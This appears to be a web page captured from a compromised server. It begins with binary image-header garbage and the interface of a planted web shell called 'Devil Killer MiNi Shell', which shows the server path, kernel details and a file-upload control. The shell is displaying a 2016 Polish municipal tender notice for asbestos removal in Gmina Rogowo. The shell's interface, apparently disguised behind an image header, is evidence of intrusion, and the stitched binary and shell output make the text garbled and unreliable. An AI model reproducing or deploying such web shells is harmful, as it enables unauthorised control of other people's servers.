JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160405/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160405/34545-N-2016.html

<p class="kh_header"><b>Rogowo: Demontaż, transport i unieszkodliwianie wyrobów zawierających azbest na terenie Gminy Rogowo w roku 2016</b><br>
<b>Numer ogłoszenia: 34545 - 2016; data zamieszczenia: 05.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Rogowo , ul. Kościelna 8, 88-420 Rogowo, woj. kujawsko-pomorskie, tel. 52 3024053, faks 52 3024275.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://rogowo.bip.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Demontaż, transport i unieszkodliwianie wyrobów zawierających azbest na terenie Gminy Rogowo w roku 2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Na przedmiot zamówienia składa się wykonanie usługi polegającej na demontażu, załadunku,  transporcie i unieszkodliwieniu wyrobów zawierających azbest z terenu Gminy Rogowo w szczególności:
1)Demontaż pokryć dachowych z płyt falistych z budynków mieszkalnych oraz gospodarczych z nieruchomości  zlokalizowanych na terenie Gminy Rogowo 
w ilości 119,500 Mg  (5 974,80 m2)  z 20 nieruchomości polegający na;
a)demontażu pokryć dachowych z płyt falistych zawierających azbest na budynkach zabudowy indywidualnej zlokalizowanych na terenie Gminy Rogowo, zgodnie  
z załączonym harmonogramem rzeczowo finansowym do projektu umowy;
b)pakowaniu i załadunku na oznakowane, specjalistyczne środki transportu;
c)transporcie zebranych odpadów zawierających azbest do miejsc ich unieszkodliwienia wskazanych przez Wykonawcę. Odbiorcy odpadów wskazani przez Wykonawcę powinni posiadać stosowne zezwolenia na prowadzenie działalności w zakresie unieszkodliwiania odpadów zawierających azbest i umowę zawartą z Wykonawcą;
d)zdeponowaniu na składowisku przetransportowanych odpadów zawierających azbest;
e)Wykonawca wystawi oświadczenie dla właściciela nieruchomości, że prace związane z usunięciem wyrobów zawierających azbest zostały wykonane                  z zachowaniem właściwych przepisów, a teren został prawidłowo oczyszczony           z odpadów niebezpiecznych;
f) prowadzenie ilościowej i jakościowej ewidencji odpadów określonych w art. 66 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r. poz. 21 z późn. zm.) 
z zastosowaniem wzorów dokumentów określonych w rozporządzeniu Ministra Środowiska z dnia 12 grudnia 2014 r. w sprawie dokumentów stosowanych na potrzeby ewidencji odpadów;                
g) dostarczanie Zamawiającemu kart przekazania odpadu na składowisko dla każdej przekazywanej ilości usuniętego azbestu; 
h) koszty ważenia wyrobów zawierających azbest ponosi Wykonawca. Ważenie zdemontowanych i odbieranych  odpadów powinno odbywać się w obecności właściciela nieruchomości. Wykonawca dokonuje ważenia i z tej czynności sporządza protokół odbiorowy zawierający co najmniej następujące informacje: - imię i nazwisko właściciela nieruchomości, od którego odbierane są odpady zawierające azbest, 
- adres nieruchomości, data odbioru, ilość odebranych odpadów w Mg i m2, potwierdzenie prawidłowego wykonania usługi
- rodzaj odpadu, podpis właściciela nieruchomości. 
- protokół winien być podpisany przez Wykonawcę usługi i przekazany Zamawiającemu, który protokół winien zatwierdzić;
i) przekazywanie na żądanie Zamawiającego informacji dotyczących realizowanych usług;
j)Zamawiający zastrzega, iż ze względu na charakter prowadzonej usługi wartości podane wyżej mogą w trakcie realizacji przedmiotu zamówienia ulec zwiększeniu lub zmniejszeniu wielkości;
k)roboty demontażowe pokryć dachowych zostały zgłoszone do Starostwa Powiatowego w Żninie przez właścicieli nieruchomości; 
l)Wykonawca otrzyma od Zamawiającego wykaz nieruchomości (20 nieruchomości), 
z których mają zostać zdemontowane wyroby zawierające azbest. Wykonawca skontaktuje się z każdym właścicielem nieruchomości w celu uzgodnienia terminu wykonania usługi. 
2)odbiór składowanych (zgodnie z przewidziana prawem technologią) płyt falistych zawierających azbest z terenu Gminy Rogowo w ilości 124,516 Mg (6 225,62 m2) 
z 34 nieruchomości zlokalizowanych na terenie Gminy Rogowo polegający na: 
a) odbiorze z nieruchomości składowanych płyt azbestowo - cementowych, zgodnie   z załączonym harmonogramem rzeczowo - finansowym do projektu umowy;
b) pakowaniu i załadunku na oznakowane, specjalistyczne środki transportu;
c)transporcie zebranych odpadów zawierających azbest do miejsc ich unieszkodliwienia wskazanych przez Wykonawcę. Odbiorcy odpadów wskazani przez Wykonawcę powinni posiadać stosowne zezwolenia na prowadzenie działalności w zakresie unieszkodliwiania odpadów zawierających azbest i umowę zawarta z Wykonawcą;
d)zdeponowanie na składowisku przetransportowanych odpadów zawierających azbest;
e) Wykonawca wystawi oświadczenie dla właściciela nieruchomości, że prace związane z usunięciem wyrobów zawierających azbest zostały wykonane                  z zachowaniem właściwych przepisów, a teren został prawidłowo oczyszczony           z odpadów niebezpiecznych;
f)prowadzenie ilościowej i jakościowej ewidencji odpadów określonych w art. 66 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r.  poz. 21 z późn. zm.) 
z zastosowaniem wzorów dokumentów określonych w rozporządzeniu Ministra Środowiska z dnia 12 grudnia 2014r. w sprawie dokumentów stosowanych na potrzeby ewidencji odpadów;                                     
g)dostarczanie Zamawiającemu kart przekazania odpadu dla każdej ilości usuniętego azbestu przekazanej na składowisko;
h) przekazywanie na żądanie Zamawiającego informacji dotyczących realizowanych usług;
i)koszty ważenia wyrobów zawierających azbest ponosi Wykonawca. Ważenie zmagazynowanych (składowanych) i odbieranych  odpadów powinno odbywać się w obecności właściciela nieruchomości. Wykonawca dokonuje ważenia i z tej czynności sporządza protokół odbiorowy zawierający co najmniej następujące informacje: 
- imię i nazwisko właściciela nieruchomości, od którego odbierane są odpady zawierające azbest, 
- adres nieruchomości, data odbioru, ilość odebranych odpadów w Mg i m2, potwierdzenie prawidłowego wykonania usługi,
- rodzaj odpadu, podpis właściciela nieruchomości
- protokół winien być podpisany przez Wykonawcę usługi, właściciela nieruchomości i przekazany Zamawiającemu, który protokół winien zatwierdzić. Podane ilości do protokółu powinny być zgodne z kartami przekazania odpadu;
j) Wykonawca otrzyma od Zamawiającego wykaz nieruchomości (34 nieruchomości), 
z których maja zostać odebrane płyty azbestowo - cementowe z miejsc magazynowania (składowania). Wykonawca skontaktuje się z każdym właścicielem nieruchomości w celu uzgodnienia terminu wykonania usługi. 
Zamawiający zastrzega, iż ze względu na charakter prowadzonej usługi ilości podane wyżej mogą w trakcie realizacji przedmiotu zamówienia ulec zwiększeniu lub zmniejszeniu ilości. Przyjęto, że 1 m2 płyty waży 20,0 kg.
Łączna ilość odpadów zawierających azbest wynosi 12 200,42 m2 a ciężar 244,016 Mg. 
Zamawiający dokona protokolarnego odbioru końcowego usługi.
3) Przedmiot zamówienia należy wykonać zgodnie z prawem obowiązującym w tym zakresie tj.:
a)ustawą z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r. poz. 21 z późn. zm.);
b)ustawą z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (Dz. U. 2013 r. poz. 1232 z późn. zm.);
c)ustawą z dnia 19 czerwca 1997 r. o zakazie stosowania wyrobów zawierających azbest (Dz. U. z 2004 r. Nr 3, poz. 20 z późn. zm.);
d)ustawą z dnia 19 sierpnia 2011 r. o przewozie towarów niebezpiecznych (Dz. U.      Nr 227, poz. 1367);
e)rozporządzeniem Ministra Gospodarki i Pracy z dnia 14 października 2005 r.             w sprawie zasad bezpieczeństwa i higieny pracy przy zabezpieczeniu i usuwaniu wyrobów zawierających azbest oraz programu szkolenia w zakresie bezpiecznego użytkowania takich wyrobów (Dz. U. Nr 216, poz. 1824);
f)rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 2 kwietnia 2004 r. w sprawie sposobów i warunków bezpiecznego użytkowania i usuwania wyrobów zawierających azbest (Dz. U. Nr 71, poz. 649 z późn. zm.);
g)rozporządzeniem Ministra Środowiska z dnia 12 grudnia 2014 r. w sprawie wzorów dokumentów stosowanych na potrzeby ewidencji odpadów (Dz. U. z 2014 r. poz. 1973);
h)rozporządzenie Ministra Gospodarki z dnia 13 grudnia 2010 r. w sprawie wymagań w zakresie wykorzystywania wyrobów zawierających azbest oraz wykorzystywania 
i oczyszczania instalacji lub urządzeń, w których były lub są wykorzystywane wyroby zawierające azbest (Dz. U. z 2011 r.  Nr 8, poz. 31);
i)ustawą z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2013 r. poz. 1409 z późn. zm.);
j)rozporządzeniem Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa    i ochrony zdrowia (Dz. U. Nr 120, poz. 1126).
4)Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia. 
5)Wymagania dotyczące robót:
a)wszystkie prace winny być zrealizowane zgodnie z przepisami, obowiązującymi normami, warunkami technicznymi i sztuką budowlaną, przepisami bhp, ppoż,  przy maksymalnym ograniczeniu uciążliwości prowadzenia usługi u właścicieli nieruchomości;
b)usługę należy prowadzić zgodnie z obowiązującymi przepisami w tym zakresie oraz wymogami niniejszej SIWZ;
6)Wymagania stawiane Wykonawcy:
a) Wykonawcy zgłosi wykonywania usługi na terenie Gminy Rogowo w Starostwie Powiatowym w Żninie, Inspektorowi Pracy oraz w Państwowym Inspektoracie Sanitarnym w Żninie zgodnie z zapisem § 6 ust. 2 rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej w sprawie sposobów i warunków bezpiecznego użytkowania i usuwania wyrobów zawierających azbest (Dz. U.       z 2004 r. Nr 71, poz. 649 z późn. zm.)
b)Wykonawca odpowiedzialny będzie za całokształt, w tym za przebieg oraz terminowe wykonanie zamówienia, za jakość, zgodność z warunkami technicznymi jakościowymi określonymi dla przedmiotu zamówienia;
c)wymagana jest należyta staranność przy realizacji zamówienia, rozumiana jako staranność profesjonalisty w działalności objętej przedmiotem niniejszego zamówienia;
d)Wykonawca zabezpieczy teren robót mając w szczególności na względzie mienie  właścicieli nieruchomości. W związku z tym Wykonawca winien zabezpieczyć budynek w przypadku gdyby w trakcie wykonywania prac nastąpiła zmiana warunków atmosferycznych bądź inne nieprzewidziane zdarzenie uniemożliwiające wykonanie usługi w uzgodnionym terminie;
e)po zakończeniu usługi Wykonawca zobowiązany jest do uporządkowania terenu nieruchomości wraz z terenem przyległym;
f)po wykonaniu przez Wykonawcę usługi przewidzianej niniejszą SIWZ Wykonawca  przedłoży Zamawiającemu: karty przekazania odpadu na składowisko dla każdej przekazywanej ilości wyrobów zawierających azbest, protokół z ważenia wraz z potwierdzeniem, że usługa została wykonana prawidłowo (podpisany przez Wykonawcę oraz właściciela nieruchomości) oraz oświadczenie, że prace związane z usunięciem wyrobów zawierających azbest zostały wykonane z zachowaniem właściwych przepisów, a teren został prawidłowo oczyszczony z odpadów niebezpiecznych dla każdej nieruchomości objętej przedmiotem zamówienia;
g)Wykonawca po podpisaniu umowy z Zamawiającym skontaktuje się i umówi            z właścicielami na termin: demontażu oraz odbioru wyrobów zawierających azbest zgodnie z załączonym do projektu harmonogramem rzeczowo-finansowym; 
h)spełnienie innych wymagań określonych we wzorze umowy oraz wynikających         z obowiązujących przepisów prawa.
7)Możliwość zatrudnienia podwykonawców:
a)Zamawiający dopuszcza możliwość powierzenia przez Wykonawcę wykonanie części zamówienia podwykonawcom; w takim przypadku Wykonawca jest zobowiązany do wskazania w swojej ofercie części zamówienia (zakresu), której wykonanie zamierza powierzyć podwykonawcom;
b)Zamawiający może zgodnie z art. 647 K.c. wnieść sprzeciw lub zastrzeżenia          do umowy zawartej pomiędzy Wykonawcą a podwykonawcą.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.65.00.00-8, 45.26.26.60-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wym aga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja tego warunku nastąpi poprzez odesłanie do odrębnych przepisów, które wskazują na obowiązek posiadania uprawnień do wykonywania określonej działalności lub czynności. Warunek ten zostanie spełniony, jeśli Wykonawca:
a)posiada aktualną umowę z właścicielem (zarządzającym) składowiskiem odpadów niebezpiecznych posiadającego odpowiednie dopuszczenie w tym zakresie na deponowanie odpadów azbestowo - cementowych;
b)	posiada aktualne zezwolenie na transport odpadów niebezpiecznych o kodach 17 06 01 i 17 06 05 - wydanego przez właściwego Starostę ze względu na miejsce siedziby Wykonawcy-oryginał lub kserokopia potwierdzona przez osobę uprawnioną.
Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia/nie spełnia na podstawie załączonego do oferty oświadczenia Wykonawcy (Załącznik nr 2 do SIWZ) potwierdzającego spełnienie tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do weryfikacji spełnienia tego warunku posłużą odpowiednio wykazy wykonanych  głównych usług. Warunek ten będzie spełniony, jeżeli Wykonawcy udokumentują, że w okresie trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie Wykonawca wykonał co najmniej 1 (jedną) usługę z podaniem ich rodzaju i wartości, daty i miejsca wykonywania oraz załączeniem dokumentu potwierdzającego, że usługi zostały wykonane lub są wykonane należycie. Wykonawca powinien udokumentować co najmniej jedną usługę polegającą na demontażu i transporcie wyrobów zawierających azbest.
Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia/nie spełnia na podstawie załączonego do oferty oświadczenia Wykonawcy (Załącznik nr 2 do SIWZ) potwierdzającego spełnienie tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że  będzie posiadał co najmniej:
a)1 samochód do transportu wyrobów zawierających azbest;
b)1 sprzęt do załadunku wyrobów zawierających azbest
z informacją o podstawie ich dysponowania.
Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia/ nie spełnia na podstawie załączonego do oferty oświadczenia Wykonawcy (Załącznik nr 2 do SIWZ) potwierdzającego spełnienie tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje  osobami posiadającymi wymagane uprawnienia do realizacji zamówienia oraz są przeszkoleni w zakresie pracy z wyrobami zawierającymi azbest (zaświadczenia o ukończeniu szkoleń, certyfikaty)  w tym  uprawnienia do kierowania robotami budowlanymi o specjalności konstrukcje budowlane w ograniczonym zakresie (minimum) jedna osoba. Wraz z ważnym zaświadczeniem o przynależności do właściwej Izby Inżynierów Budownictwa. 
Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia/ nie spełnia na podstawie załączonego do oferty oświadczenia Wykonawcy (Załącznik nr 2 do SIWZ) potwierdzającego spełnienie tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań w tym zakresie. 
Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia/ nie spełnia na podstawie załączonego do oferty oświadczenia Wykonawcy (Załącznik     nr 2 do SIWZ) potwierdzającego spełnienie tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

